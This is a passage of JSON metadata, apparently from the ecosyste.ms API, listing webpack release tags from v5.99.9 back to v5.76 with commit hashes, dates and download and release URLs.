osyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7